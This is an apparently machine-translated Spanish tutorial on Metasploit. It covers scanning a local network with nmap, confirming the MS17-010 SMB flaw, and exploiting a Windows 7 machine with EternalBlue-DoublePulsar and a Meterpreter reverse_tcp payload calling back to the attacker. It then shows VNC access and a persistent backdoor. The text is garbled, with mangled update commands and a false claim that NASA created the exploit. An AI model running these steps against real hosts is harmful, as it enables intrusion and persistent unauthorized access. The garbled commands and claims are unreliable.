Tutorial de metasploit

Tutorial de metasploit

Como hemos discutido la mejor herramienta de Kali Linux de Top 25, y pusimos MetaSploit al principio en la lista, ahora discutamos y aprendamos sobre Metasploit. Le recomendamos que esté familiarizado con Metasploit.

MetaSploit creado inicialmente por H. D Moore en 2003, hasta que fue adquirido y desarrollado más a fondo por Rapid7 el 21 de octubre de 2009. MetaSploit-Framework está completamente escrito usando Ruby, y es un paquete estándar instalado en el sistema Kali Linux (y también casi todos los SO de prueba de penetración, supongo). Es un kit favorito de los hackers o los probadores de penetración para investigar las vulnerabilidades de seguridad, desarrollar y ejecutar exploits en objetivos y otros desarrollo de seguridad.

Metasploit viene con varias ediciones, generalmente divididas en dos categorías, versión gratuita y versión pagada. Las versiones gratuitas: MetaSploit Framework Community Edition (interfaz basada en CLI) y Armitage (interfaz basada en GUI). Las versiones pagas: MetaSploit Express, MetaSploit Pro y Cobalt Strike (es similar a Armitage, proporcionado por Strategic Cyber ​​LLC).

MetaSploit permite a los usuarios crear (o desarrollar) su propio código de exploit, pero no se preocupe si no sabe cómo codificar, MetaSploit tiene tantos módulos y se actualizan continuamente. Actualmente MetaSploit tiene más de 1600 exploits y 500 cargas útiles. La forma simple de comprender cuáles son las exploits y las cargas útiles, una exploit es básicamente cómo el atacante entrega la carga útil, a través del orificio de vulnerabilidad del sistema objetivo. Una vez que el atacante lanza el exploit que contiene una carga útil contra el objetivo vulnerable, entonces la carga útil implementada (la carga útil utilizada para conectarse al atacante para obtener acceso remoto contra el sistema objetivo), en esta etapa se realiza la exploit y se vuelve irrelevante.

"Metasploit no es una herramienta instantánea de piratería, es un marco loco"

Este artículo de MetaSploit se trata de realizar pruebas de penetración contra un sistema objetivo utilizando el siguiente flujo:

  • Escaneo de vulnerabilidad
  • Evaluación de vulnerabilidad
  • Explotación
  • Obtener acceso remoto: poseer el sistema

PREPARACIÓN

Asegúrese de que nuestro Kali Linux tenga la última versión actualizada. Habrá mejoras en cada actualización. Ejecute los siguientes comandos:

~# APT ACTUALIZACIÓN
~# APT UPDACCIDE -Y
~# Apt Dist -Upgrade -y

Una vez que nuestra máquina está actualizada, ahora comencemos encendiendo la consola de MetaSploit. En la terminal, escriba:

~# msfconsole

Y también necesita cualquier editor de texto, Gedit o Leafpad, para recopilar información en el camino antes de compilar el ataque. En primer lugar, identifique su dirección IP de la interfaz inalámbrica, la IP del enrutador y la máscara de red.

Según la información anterior, la nota de la dirección IP WLAN1 y Router, y la máscara de red. Entonces, la nota debería verse así:

Atacante IP (LHOST): 192.168.1.56
IP de puerta de enlace / enrutador: 192.168.1.1
Netmask: 255.255.255.0 (/24)


Paso 1: Escaneo de vulnerabilidad

En la consola de MetaSploit, primero recopilamos información, como la dirección IP de destino, el sistema operativo, los puertos abiertos y la vulnerabilidad. MetaSploit nos permite ejecutar NMAP directamente desde la consola. Basado en la información anterior, ejecute este comando para lograr nuestra tarea de recopilación de información.

MSF> NMAP -V 192.168.1.1/24 --script vuln -pn -o

Del comando anterior obtuvimos el resultado a continuación.

Obtuvimos un objetivo vulnerable que ejecuta el sistema operativo Windows, y el vulnerable está en el servicio SMBV1. Entonces, agregue a la nota.

Target IP (RHOST): 192.168.1.57
Vulnerabilidad: Vulnerabilidad de ejecución de código remoto en servidores Microsoft SMBV1 (MS17-010)


Paso 2: Evaluación de vulnerabilidad

Ahora conocemos el objetivo y su vulnerabilidad. Vamos a ver la vulnerabilidad en la consola de metasploit

Ahora conocemos el objetivo y su vulnerabilidad. Vamos a ver la vulnerabilidad en la consola MetaSploit usando el módulo auxiliar SMB_Scanner. Ejecute el siguiente comando:

MSF> Usar auxiliar/escáner/smb/smb_ms17_010
MSF Auxiliar (SMB_MS17_010)> Establecer Rhosts [Target IP]
MSF auxiliar (SMB_MS17_010)> Ejecutar

Metasploit confía en la vulnerabilidad, y muestra la edición exacta de Windows OS. Agregue a la nota:

OS de destino: Windows 7 Ultimate 7600


Paso 3: Explotación

Desafortunadamente, MetaSploit no tiene un módulo de exploit relacionado con esta vulnerabilidad. Pero, no te preocupes, hay un tipo afuera expuesto y escribió el código de exploit. El exploit es familiar, ya que es iniciado por la NASA, se llama EternalBlue-DoublePulsar. Puede tomarlo desde aquí, o puede seguir la guía desde el video tutorial a continuación para instalar el código de explotación en su marco de Metasploit.

Una vez que haya seguido la guía de arriba, (asegúrese de que el camino sea el mismo que el tutorial). Ahora, estás listo para explotar el objetivo. Ejecute los siguientes comandos:

Use Exploit/Windows/SMB/EternalBlue_DoublePulsar
Establecer Windows de carga útil/meterpreter/reverse_tcp
establecer processinject spoolsv.exe
establecer rhost 192.168.1.57
establecer lhost 192.168.1.56

Explotar

Boom ... la exploit tiene éxito, obtuvimos una sesión de meterpreter. Como mencioné anteriormente, una vez que el Exploit lo inició, implementará la carga útil, que es, aquí usamos, Windows/meterpréter/reverse_tcp.


Paso 4: Obtener acceso remoto

Explore los comandos más disponibles, ingrese '?'(sin un signo de cuestión) y ver comandos disponibles enumerados. El Stdapi, Los comandos del sistema son:

Para ver más información sobre el sistema de destino, use 'sysinfo' dominio. La salida debería verse así.

Dado que inyectamos el proceso del sistema antes (spoolsv.exe), tenemos privilegio del sistema. Somos dueños del objetivo. Podemos hacer mucho con el comando al objetivo. Por ejemplo, podríamos ejecutar RDP, o simplemente establecer VNC Remote. Para ejecutar el servicio VNC Ingrese el comando:

~# ejecutar vnc

El resultado debe ser el escritorio de la máquina de destino, se ve así.

La parte más importante es crear una puerta trasera, por lo que cada vez que el objetivo se desconecte en nuestra máquina, la máquina de destino intentará conectarse nuevamente a nosotros. El trasero se usa para mantener el acceso, es como la pesca, no arrojará su pez hacia el agua una vez que tenga el pez, correcto? Desea hacer algo con el pescado, ya sea para guardarlo en el refrigerador para obtener más acciones, como cocinarlo o venderlo por dinero.

Meterpreter tiene esta función de trasero persistentemente. Ejecute el siguiente comando y eche un vistazo a los parámetros y argumentos disponibles.

meterpreter> Corre la persistencia -H

Si no se siente cómodo con este secuencia de guiones en desuso, el módulo de persistencia más reciente está bajo post/windows/administrar/persistence_exe. Puedes explorarlo más por ti mismo por ti mismo.

MetaSploit es enorme, no es solo una herramienta, es un marco, considere que tiene más de 1600 exploits y alrededor de 500 cargas útiles. Un artículo es apto para el panorama general del uso general o la idea. Pero, has aprendido mucho de este artículo.

"Cuanto más sigues el flujo de ataque, más tendrás un desafío sin esfuerzo."